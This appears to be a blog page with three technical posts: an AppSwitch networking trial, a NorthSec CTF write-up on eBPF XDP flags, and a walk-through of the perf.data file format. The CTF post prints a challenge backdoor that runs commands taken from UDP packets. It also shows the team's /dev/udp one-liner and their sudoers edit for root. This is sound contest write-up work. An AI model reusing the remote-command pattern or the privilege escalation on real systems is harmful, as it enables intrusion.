So, what’s this AppSwitch thing going around?

I recently read Jérôme Petazzoni’s blog post about a tool called AppSwitch which made some Twitter waves on the busy interwebz. I was intrigued. It turns out that it was something that I was familiar with. When I met Dinesh back in 2015 at Linux Plumbers in Seattle, he had presented me with a grand vision of how applications needs to be free of any networking constraints and configurations and a uniform mechanism should evolve that make such configurations transparent (I’d rather say opaque now). There are layers over layers of network related abstractions. Consider a simple network call made by a java application. It goes through multiple layers in userspace (though the various libs, all the way to native calls from JVM and eventually syscalls) and then multiple layers in kernel-space (syscall handlers to network subsytems and then to driver layers and over to the hardware). Virtualization adds 4x more layers.  Each point in this chain does have a justifiable unique configuration point. Fair point. But from an application’s perspective, it feels like fiddling with the knobs all the time :

christmas_settings
Christmas Settings: https://xkcd.com/1620/

For example, we have of course grown around iptables and custom in-kernel and out of kernel load balancers and even enhanced some of them to exceptional performance (such as XDP based load balancing).  But when it comes to data path processing, doing nothing at all is much better than doing something very efficiently. Apps don’t really have to care about all these myriad layers anyway. So why not add another dimension to this and let this configuration be done at the app level itself? Interesting.. 🤔

I casually asked Dinesh to see how far the idea had progressed and he ended up giving me a single binary and told me that’s it! It seems AppSwitch had been finally baked in the oven.

First Impressions

So there is a single static binary named ax which runs as an executable as well as in a daemon mode. It seems AppSwitch is distributed as a docker image as well though. I don’t see any kernel module (unlike what Jerome tested). This is definitely the userspace version of the same tech.

I used the ax docker image.  ax was both installed and running with one docker-run command.

$ docker run -d --pid=host --net=none -v /usr/bin:/usr/bin -v /var/run/appswitch:/var/run/appswitch --privileged docker.io/appswitch/ax 

Based on the documentation, this little binary seems to do a lot — service discovery, load balancing, network segmentation etc.  But I just tried the basic features in a single-node configuration.

Let’s run a Java webserver under ax.

# ax run --ip 1.2.3.4 -- java -jar SimpleWebServer.jar

This starts the webserver and assigns the ip 1.2.3.4 to it. Its like overlaying the server’s own IP configurations through ax such that all request are then redirected through 1.2.3.4. While idling, I didn’t see any resource consumption in the ax daemon. If it was monitoring system calls with auditd or something, I’d have noticed some CPU activity. Well, the server didn’t break, and when accessed via a client run through ax, it starts serving just fine.

# ax run --ip 5.6.7.8 -- curl -I 1.2.3.4

HTTP/1.0 500 OK
Date: Wed Mar 28 00:19:25 PDT 2018
Server: JibbleWebServer/1.0
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 58 Last-modified: Wed Mar 28 00:19:25 PDT 2018 

Naaaice! 🙂 Why not try connecting with Firefox. Ok, wow, this works too!

ax-firefox

I tried this with a Golang http server (Caddy) that is statically linked.  If ax was doing something like LD_PRELOAD, that would trip it up. This time I tried passing a name rather than the IP and ran it as regular user with a built-in --user option

# ax run --myserver --user suchakra -- caddy -port 80

# ax run --user suchakra -- curl -I myserver
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=utf-8
Etag: "p6f4lv0"
Last-Modified: Fri, 30 Mar 2018 19:25:07 GMT
Server: Caddy
Date: Sat, 31 Mar 2018 01:52:28 GMT

So no kernel module tricks, it seems. I guess this explains why Jerome called it “Network Stack from the future”. The future part here is applications and with predominant containerized deployments, the problems of microservices networking have really shifted near to the apps.

We need to get rid of the overhead caused by networking layers and frequent context switches happening as a single containerized app communicates with another one. AppSwitch could potentially just eliminate this all together and the communication would actually resemble traditional socket based IPC mechanisms with an advantage of a zero overhead read/write cost once the connection is established. I think I would want to test this out thoroughly sometime in the future if i get some time off from my bike trips 🙂

How does it work?

Frankly I don’t know in-depth, but I can guess. All applications, containerized or not, are just a bunch of executables linked to libs (or built statically) running over the OS. When they need OS’s help, they ask. To understand an application’s behavior or to morph it, OS can help us understand what is going on and provide interfaces to modify its behavior. Auditd for example, when configured, can allow us to monitor every syscall from a given process. Programmable LSMs can be used to set per-resource policies through kernel’s help. For performance observability, tracing tools have traditionally allowed an insight into what goes on underneath. In the world of networking, we again take the OS’s help – routing and filtering strategies are still defined through iptables with some advances happening in BPF-XDP. However, in the case of networking, calls such as connect(), accept() could be intercepted purely in userspace as well. But doing so robustly and efficiently without application or kernel changes with reasonable performance has been a hard academic problem for decades [1][2]. There must be some other smart things at work underneath in ax to keep this robust enough for all kinds of apps. With interception problem solved, this would allow ax to create a map and actually perform the ‘switching’ part (which I suppose justifies the AppSwitch name). I have tested it presently on a Java, Go and a Python server. With network syscall interception seemingly working fine, the data then flows like hot knife on butter. There may be some more features and techniques that I may have missed though. Going through ax --help it seems there are some options for egress, WAN etc, but I haven’t played it with that much. 

Some Resources

References

[1] Practical analysis of stripped binary code [link]
[2] Analyzing Dynamic Binary Instrumentation Overhead [link]

Advertisements

An entertaining eBPF XDP adventure

In this post, I discuss about the CTF competition track of NorthSec, an awesome security conference and specifically about our tale of collecting two elusive flags that happened to be based upon eBPF XDP technology – something that is bleeding edge and uber cool!

In case you did not know, eBPF eXpress Data Path (XDP) is redefining how network traffic is handled on devices. Filtering, routing and reshaping of incoming packets at a very early stage even before the packets enter the networking stack the other Linux kernel has allowed unprecedented speed and provides a base for applications in security (DDoS mitigation), networking and performance domain. There is a lot of material from Quentin Monnet, Julia Evans, Cilium and IOVisor projects, about what eBPF/XDP is capable of. For the uninitiated, generic information about eBPF can also be found on Brendan Gregg’s eBPF page and links. If you think you want to get serious about this, here are some more links and detailed docs. In a recent talk I gave, I showed a diagram similar to the one below – as I started teasing myself on the possible avenues beyond the performance monitoring and tracing usecase that is dear to my heart :

cls-xdp
TC with cls_bpf and XDP. Actions on packet data is taken at the driver level in XDP

The full presentation is here. So, what’s interesting here is that the incoming packets from the net-device can now be statefully filtered or manipulated even before they reach the network stack. This has been made possible by the use of extended Berkeley Packet Filter (eBPF) programs which allows such low-level actions at the driver level to be flexibly programmed in a safe manner from the userspace. The programming is done in a restricted-C syntax that gets compiled to BPF bytecode by LLVM/Clang. The bpf() syscall then allows the bytecode to be sent to the kernel at proper place – here, these are the ‘hooks’ at ingress and egress of raw packets. Before getting attached, the program goes through a very strict verifier and an efficient JIT compiler that converts the BPF programs to native machine code (which is what makes eBPF pretty fast) Unlike the register struct context for eBPF programs attached to Kprobes, the context passed to the XDP eBPF programs is the XDP metadata struct. The data is directly read and parsed from within the BPF program, reshaped if required and an action taken for it. The action can be either XDP_PASS, where it is passed to the network stack as seen in the diagram, or XDP_DROP, where it dropped by essentially sending it back to the driver queue and XDP_TX which sends the packets back to the NIC they came from. While the packet PASS and DROP can be a good in scenarios such as filtering IPs, ports and packet contents, the TX usecase is more suited for load balancing where the packet contents can be modified and transmitted back to the NIC. Currently, Facebook is exploring its use and presented their load balancing and DDoS prevention framework based on XDP in the recent Netdev 2.1 in Montreal. Cilium Project is another example of XDP’s use in container networking and security and is an important project resulting from the eBPF tech.

NorthSec BPF Flag – Take One

Ok, enough of XDP basics for now. Coming back to the curious case of a fancy CTF challenge at NorthSec, we were presented with a VM and told that “Strange activity has been detected originating from the rao411 server, but our team has been unable to understand from where the commands are coming from, we need your help.” It also explicitly stated that the machine was up-to-date Ubuntu 17.04 with an unmodified kernel. Well, for me that is a pretty decent hint that this challenge would require kernel sorcery. Simon checked the /var/log/syslog and saw suspicions prints every minute or two that was causing the /bin/true command to run. Pretty strange. We sat together and still tried to use netcat to listen to network chatter on multiple ports as we guessed that something was being sent from outside to the rao411 server.  Is it possible that the packets were somehow being dropped even before they reached the network stack? We quickly realized that what we were seeing was indeed related to BPF as we saw some files lying around in the VM which looked like these (post CTF event, Julien Desfossez, who designed the challenge has been generous enough to provide the code, which itself is based on Jesper Dangaard Brouer’s code in the kernel source tree) As we see, there are the familiar helper functions used for loading BPF programs and manipulating BPF maps. Apart from that, there was the xdp_nsec_kern.c file which contained the BPF program itself! A pretty decent start it seems 🙂 Here is the code for the parse_port() function in the BPF XDP program that is eventually called when a packet is encountered :


u32 parse_port(struct xdp_md *ctx, u8 proto, void *hdr)
{
void *data_end = (void *)(long)ctx->data_end;
struct udphdr *udph;
u32 dport;
char *cmd;
unsigned long payload_offset;
unsigned long payload_size;
char *payload;
u32 key = 0;

if (proto != IPPROTO_UDP) {
return XDP_PASS;
}

udph = hdr;
if (udph + 1 > data_end) {
return XDP_ABORTED;
}

payload_offset = sizeof(struct udphdr);
payload_size = ntohs(udph->len) - sizeof(struct udphdr);

dport = ntohs(udph->dest);
if (dport == CMD_PORT + 1) {
return XDP_DROP;
}

if (dport != CMD_PORT) {
return XDP_PASS;
}

if ((hdr + payload_offset + CMD_SIZE) > data_end) {
return XDP_ABORTED;
}
cmd = bpf_map_lookup_elem(&nsec, &key);
if (!cmd) {
return XDP_PASS;
}
memset(cmd, 0, CMD_SIZE);
payload = &((char *) hdr)[payload_offset];
cmd[0] = payload[0];
cmd[1] = payload[1];
cmd[2] = payload[2];
cmd[3] = payload[3];
cmd[4] = payload[4];
cmd[5] = payload[5];
cmd[6] = payload[6];
cmd[7] = payload[7];
cmd[8] = payload[8];
cmd[9] = payload[9];
cmd[10] = payload[10];
cmd[11] = payload[11];
cmd[12] = payload[12];
cmd[13] = payload[13];
cmd[14] = payload[14];
cmd[15] = payload[15];

return XDP_PASS;
}

Hmmm… this is a lot of information. First, we observe that the destination port is extracted from the UDP header by the BPF program and the packets are only passed if the destination port is CMD_PORT (which turns out to be 9000 as defined in the header xdp_nsec_common.h). Note that the XDP actions are happening too early, hence even if we were to listen at port 9000 using netcat, we would not see any activity. Another pretty interesting thing is that some payload from the packet is being used to prepare a cmd string. What could that be? Why would somebody prepare a command from a UDP packet? 😉

Lets dig deep. So, the /var/log/syslog was saying that it is executing xdp_nsec_cmdline intermittently and executing /bin/true. Maybe there is something in that file? A short glimpse of xdp_nsec_cmdline.c confirms our line of thought! Here is the snippet from its main function :

int main(int argc, char **argv)
{
.
.
    cmd = malloc(CMD_SIZE * sizeof(char));
    fd_cmd = open_bpf_map(file_cmd);

    memset(cmd, 0, CMD_SIZE);
    ret = bpf_map_lookup_elem(fd_cmd, &key, cmd);
    printf("cmd: %s, ret = %d\n", cmd, ret);
    close(fd_cmd);
    ret = system(cmd);
.
.
}

The program opens the pinned BPF map file_cmd (which actually is /sys/fs/bpf/nsec) and looks up the value stored and executes it. Such Safe. Much Wow. It seems we are very close. We just need to craft a UDP packet which then updates the map with the command in payload. The first flag was a file called flag which was not accessible by the logged in raops user. So we just made a script in /tmp which changed permission for that file and sent the UDP packet containing our script.

Trivia! Bash has an alias to send UDP packets :
echo -n "/tmp/a.sh" >/dev/udp//9000 

So, we now just had to wait for the program to run the xdp_nsec_cmdline which would trigger our script. And of course it worked! We opened the flag and submitted it. 6 points to InfoSecs!

NorthSec BPF Flag – Take Two

Of course, our immediate action next was to add raops user to /etc/sudoers 😉 Once we had root access, we could now recompile and re-insert the BPF program as we wished. Simon observed an interesting check in the BPF XDP program listed above that raised our brows :

...
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }
...

Why would someone want to drop the packets coming at 9001 explicitly? Unless..there was a message being sent on that port from outside! While not an elegant approach, we just disabled the XDP_DROP check so that the packet would reach the network stack and we could just netcat the data on that port. Recompile, re-insert and it worked! The flag was indeed being sent on 9001 which was no longer dropped now. 8 points to InfoSecs!

Mandatory cool graphic of us working

I really enjoyed this gamification of advanced kernel tech as it increases its reach to the young folks interested in Linux kernel internals and modern networking technologies. Thanks to Simon Marchi for seeing this through with me and Francis Deslauriers for pointing out the challenge to us! Also, the NorthSec team (esp. Julien Desfossez and Michael Jeanson) who designed this challenge and made the competition more fun for me! Infact Julien started this while watching the XDP talks at Netdev 2.1. Also, thanks to the wonderful lads Marc-Andre, Ismael, Felix, Antoine and Alexandre from University of Sherbrooke who kept the flag chasing momentum going 🙂 It was a fun weekend! That’s all for now. If I get some more time, I’d write about an equally exciting LTTng CTF (Common Trace Format) challenge which Simon cracked while I watched from the sidelines.

EDIT : Updated the above diagram to clarify that XDP filtering happens early at the driver level – even before TC ingress and egress. TC with cls_bpf also allows BPF programs to be run. This was indeed a precursor to XDP.

Deconstructing Perf’s Data File

It is no mystery that Perf is like a giant organism written in C with an infinitely complex design. Of course, there is no such thing. Complexity is just a state of mind they would say and yes, it starts fading away as soon as you get enlightened. So, one fine day, I woke up and decided to understand how the perf.data file works because I wanted to extract the Intel PT binary data from it. I approached Francis and we started off on an amazing adventure (which is still underway). If you are of the impatient kind, here is the code.

A Gentle Intro to Perf

I would not delve deep into Perf right now. However, the basics are simple to grasp. It is like a Swiss army knife which contains tools to understand your system from either a very coarse to a quite fine granularity level. It can go all the way from profiling, static/dynamic tracing to custom analyses build up on hardware performance counters. With custom scripts, you can generate call-stacks, Flame Graphs and what not! Many tracing tools such as LTTng also support adding perf contexts to their own traces. My personal experience with Perf has usually been just to profile small piece of code. Sometimes I use its annotate feature to look at the disassembly to see instruction profiling right from my terminal. Occasionally, I use it to get immediate stats on system events such as syscalls etc. Its fantastic support with the Linux kernel owing to the fact that it is tightly bound to each release, means that you can always have reliable information. Brendan Gregg has written so much about it as part of his awesome Linux performance tools posts. He has some some actual useful stuff you can do with Perf. My posts here just talks about some of its internals. So, if Perf was a dinosaur, I am just talking about its toe in this post.

Perf contains a kernel part and a userspace part. The userspace part of Perf is located in the kernel directory tools/perf. The perf command that we use is compiled here. It reads kernel data from the Perf buffer based on the events you select for recording. For a list of all events you can use, do perf list or sudo perf list. The data from the Perf’s buffer is then written to the perf.data file. For hardware traces such as in Intel PT, the extra data is written in auxiliary buffers and saved to the data file. So to get your own custom stuff out from Perf, just read its data file. There are multiple ways like using scripts too, but reading a binary directly allows for a better learning experience. But the perf.data is like a magical output file that contains a plethora of information based on what events you selected, how the perf record command was configured. With hardware trace enabled, it can generate a 200MB+ file in 3-4 seconds (yes, seriously!). We need to first know how it is organized and how the binary is written.

Dissection Begins

Rather than going deep and trying to understand scripted ways to decipher this, we went all in and opened the file with a hex editor. The goal here was to learn how the Intel PT data can be extracted from the AUX buffers that Perf used and wrote in the perf.data file. By no means is this the only correct way to do this. There are more elegant solutions I think, esp. if you see some kernel documentation and the uapi perf_event.h file or see these scripts for custom analysis. Even then, this can surely be a good example to tinker around more with Perf. Here is the workflow:

  1. Open the file as hex. I use either Vim with :%!xxd command or Bless. This will come in handly later.
  2. Use perf report -D to keep track of how Perf is decoding and visualizing events in the data file in hex format.
  3. Open the above command with GDB along with the whole Perf source code. It is in the tools/perf directory in kernel source code.

If you setup your IDE to debug, you would also have imported the Perf source code. Now, we just start moving incrementally – looking at the bytes in the hex editor and correlating them with the magic perf report is doing in the debugger. You’ll see lots of bytes like these :

Screenshot from 2016-06-16 19-01-42

A cursory looks tells us that the file starts with a magic – PERFFILE2. Searching it in the source code eventually leads to the structure that defines the file header:

 struct perf_file_header {
   u64 magic;
   u64 size;
   u64 attr_size;
   struct perf_file_section attrs;
   struct perf_file_section data;
   /* event_types is ignored */
   struct perf_file_section event_types;
   DECLARE_BITMAP(adds_features, HEADER_FEAT_BITS);
};

So we start by mmaping the whole file to buf and just typecasting it to this. The header->data element is an interesting thing. It contains an offset and size as part of perf_file_section struct. We observe, that the offset is near the start of some strings – probably some event information? Hmm.. so lets try to typecast this offset position in the mmap buffer (pos + buf) to perf_event_header struct :

struct perf_event_header {
   __u32 type;
   __u16 misc;
   __u16 size;
};

For starters, lets further print this h->type and see what the first event is. With our perf.data file, the perf report -D command as a reference tells us that it may be the event type 70 (0x46) with 136 (0x88) bytes of data in it. Well, the hex says its the same thing at (buf + pos) offset. This in interesting! Probably we just found our event. Lets just iterate over the whole buffer while adding the h->size. We will print the event types as well.

while (pos < file.size()) {
    struct perf_event_header *h = (struct perf_event_header *) (buf + pos);
    qDebug() << "Event Type" <type;
    qDebug() << "Event Size" <size;
    pos += h->size;
}

Nice! We have so many events. Who knew? Perhaps the data file is not a mystery anymore. What are these event types though? The perf_event.h file has a big enum with event types and some very useful documentation. Some more mucking around leads us to the following enum :

enum perf_user_event_type { /* above any possible kernel type */
    PERF_RECORD_USER_TYPE_START = 64,
    PERF_RECORD_HEADER_ATTR = 64, 
    PERF_RECORD_HEADER_EVENT_TYPE = 65, /* depreceated */
    PERF_RECORD_HEADER_TRACING_DATA = 66,
    PERF_RECORD_HEADER_BUILD_ID = 67,
    PERF_RECORD_FINISHED_ROUND = 68,
    PERF_RECORD_ID_INDEX = 69,
    PERF_RECORD_AUXTRACE_INFO = 70,
    PERF_RECORD_AUXTRACE = 71,
    PERF_RECORD_AUXTRACE_ERROR = 72,
    PERF_RECORD_HEADER_MAX
};

So event 70 was PERF_RECORD_AUXTRACE_INFO. Well, the Intel PT folks indicate in the documentation that they store the hardware trace data in an AUX buffer. And perf report -D also shows event 71 with some decoded PT data. Perhaps, that is what we want. A little more fun with GDB on perf tells us that while iterating perf itself uses the union perf_event from event.h which contains an auxtrace_event struct as well.

struct auxtrace_event {
    struct perf_event_header header;
    u64 size;
    u64 offset;
    u64 reference;
    u32 idx;
    u32 tid;
    u32 cpu;
    u32 reserved__; /* For alignment */
};

So, this is how they lay out the events in the file. Interesting. Well, it seems we can just look for event type 71 and then typecast it to this struct. Then extract the size amount of bytes from this and move on. Intel PT documentation further says that the aux buffer was per-CPU so we may need to extract separate files for each CPU based on the cpu field in the struct. We do just that and get our extracted bytes as raw PT packets which the CPUs generated when the intel_pt event was used with Perf.

A Working Example

The above exercise was surprisingly easy once we figured out stuff so we just did a small prototype for our lab’s research purposes.  There are lot of things we learnt. For example, the actual bytes for the header (containing event stats etc. – usually the thing that Perf prints on top if you do perf report --header) are actually written at the end of the Perf’s data file. How endianness of file is determined by magic. Just before the header in the end, there are some bytes which I still have not figured out (near event 68) how they can be handled. Perhaps it is too easy, and I just don’t know the big picture yet. We just assume there are no more events if the event size is 0 😉 Works for now. A more convenient way that this charade is to use scripts such as this for doing custom analyses. But I guess it is less fun that going all l33t on the data file.

I’ll try to get some more events out along with the Intel PT data and see what all stuff is hidden inside. Also, Perf is quite tightly bound to the kernel for various reasons. Custom userspace APIs may not always be the safest solution. There is no guarantee that analyzing binary from newer versions of Perf would always work with the approach of our experimental tool. I’ll keep you folks posted as I discover more about Perf internals.